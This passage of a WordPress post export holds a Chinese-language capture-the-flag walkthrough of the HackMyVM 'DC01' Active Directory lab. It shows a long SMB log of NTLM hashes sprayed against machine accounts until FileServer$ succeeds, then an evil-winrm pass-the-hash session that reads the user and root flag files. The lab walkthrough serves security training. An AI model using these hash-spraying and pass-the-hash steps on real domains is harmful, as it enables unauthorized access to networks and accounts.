STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\FileServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\MailServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\BackupServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\ApplicationServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\PrintServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\ProxyServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\MonitoringServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\WebServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\DatabaseServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\CitrixServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\FileServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\MailServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\BackupServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\ApplicationServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\PrintServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\ProxyServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\MonitoringServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\WebServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\DatabaseServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\CitrixServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\FileServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\MailServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\BackupServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\ApplicationServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\PrintServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\ProxyServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\MonitoringServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\WebServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\DatabaseServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\CitrixServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [+] SOUPEDECODE.LOCAL\\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)<\/code><\/pre>\n<p>\u5f97\u5230\u4e00\u5904\u7528\u6237\u5bc6\u7801\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257571.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257571.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240816125204825\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u5bfb\u627eflag<\/h2>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ evil-winrm -i $IP -u &#039;FileServer$&#039; -H &#039;e41da7e79a4c76dbd9cf79d1cb325559&#039;\n\nEvil-WinRM shell v3.5\n\nWarning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine\n\nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n\nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\FileServer$\\Documents&gt; cd ..\/..\/\n*Evil-WinRM* PS C:\\Users&gt; dir \/s *.txt\nCannot find path &#039;C:\\s&#039; because it does not exist.\nAt line:1 char:1\n+ dir \/s *.txt\n+ ~~~~~~~~~~~~\n    + CategoryInfo          : ObjectNotFound: (C:\\s:String) [Get-ChildItem], ItemNotFoundException\n    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand\n*Evil-WinRM* PS C:\\Users&gt; ls -la\nA parameter cannot be found that matches parameter name &#039;la&#039;.\nAt line:1 char:4\n+ ls -la\n+    ~~~\n    + CategoryInfo          : InvalidArgument: (:) [Get-ChildItem], ParameterBindingException\n    + FullyQualifiedErrorId : NamedParameterNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand\n*Evil-WinRM* PS C:\\Users&gt; clear\n*Evil-WinRM* PS C:\\Users&gt; cls\n*Evil-WinRM* PS C:\\Users&gt; ls\n\n    Directory: C:\\Users\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\nd-----         6\/15\/2024  12:56 PM                Administrator\nd-----         8\/16\/2024  12:28 PM                FileServer$\nd-r---         6\/15\/2024  10:54 AM                Public\nd-----         6\/17\/2024  10:24 AM                ybob317\n\n*Evil-WinRM* PS C:\\Users&gt; cd ybob317\n*Evil-WinRM* PS C:\\Users\\ybob317&gt; dir\n\n    Directory: C:\\Users\\ybob317\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\nd-r---         6\/17\/2024  10:24 AM                3D Objects\nd-r---         6\/17\/2024  10:24 AM                Contacts\nd-r---         6\/17\/2024  10:45 AM                Desktop\nd-r---         6\/17\/2024  10:24 AM                Documents\nd-r---         6\/17\/2024  10:24 AM                Downloads\nd-r---         6\/17\/2024  10:24 AM                Favorites\nd-r---         6\/17\/2024  10:24 AM                Links\nd-r---         6\/17\/2024  10:24 AM                Music\nd-r---         6\/17\/2024  10:24 AM                Pictures\nd-r---         6\/17\/2024  10:24 AM                Saved Games\nd-r---         6\/17\/2024  10:24 AM                Searches\nd-r---         6\/17\/2024  10:24 AM                Videos\n\n*Evil-WinRM* PS C:\\Users\\ybob317&gt; cd Desktop\n*Evil-WinRM* PS C:\\Users\\ybob317\\Desktop&gt; dir\n\n    Directory: C:\\Users\\ybob317\\Desktop\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\n-a----         6\/12\/2024   4:54 AM             32 user.txt\n\n*Evil-WinRM* PS C:\\Users\\ybob317\\Desktop&gt; type user.txt\nxxxxxxxxxx\n*Evil-WinRM* PS C:\\Users\\ybob317\\Desktop&gt; cd ..\/..\/Administrator\n*Evil-WinRM* PS C:\\Users\\Administrator&gt; cd Desktop\n*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop&gt; dir\n\n    Directory: C:\\Users\\Administrator\\Desktop\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\nd-----         6\/17\/2024  10:41 AM                backup\n-a----         6\/17\/2024  10:44 AM             32 root.txt\n\n*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop&gt; type root.txt\nxxxxxxxxxx<\/code><\/pre>\n<p>\u8def\u9014\u8270\u8f9b\u554a\uff0c\u597d\u5728\u7ed3\u679c\u662f\u597d\u7684\u3002\u3002\u3002\u3002\u3002<\/p>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/mikannse.space\/2024\/07\/14\/%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95(%E4%B8%80%E4%B8%80%E5%85%AB)%E4%B9%8BHMVDC01\/\">https:\/\/mikannse.space\/2024\/07\/14\/%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95(%E4%B8%80%E4%B8%80%E5%85%AB)%E4%B9%8BHMVDC01\/<\/a><\/p>\n<p><a href=\"https:\/\/github.com\/Brntpcnr\/WriteupsHMV\/blob\/main\/DC01.txt\">https:\/\/github.com\/Brntpcnr\/WriteupsHMV\/blob\/main\/DC01.txt<\/a><\/p>\n<p><a href=\"https:\/\/y4er.com\/posts\/kerberos-kerberoasting-spn\/\">https:\/\/y4er.com\/posts\/kerberos-kerberoasting-spn\/<\/a><\/p>\n<p><a href=\"https:\/\/gaznetsystems.com\/Hackmyvm\/Easy\/DC01\">https:\/\/gaznetsystems.com\/Hackmyvm\/Easy\/DC01<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>DC01 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01] \u2514\u2500$ nmap -P [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-783","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/783","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=783"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/783\/revisions"}],"predecessor-version":[{"id":784,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/783\/revisions\/784"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=783"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=783"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=783"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}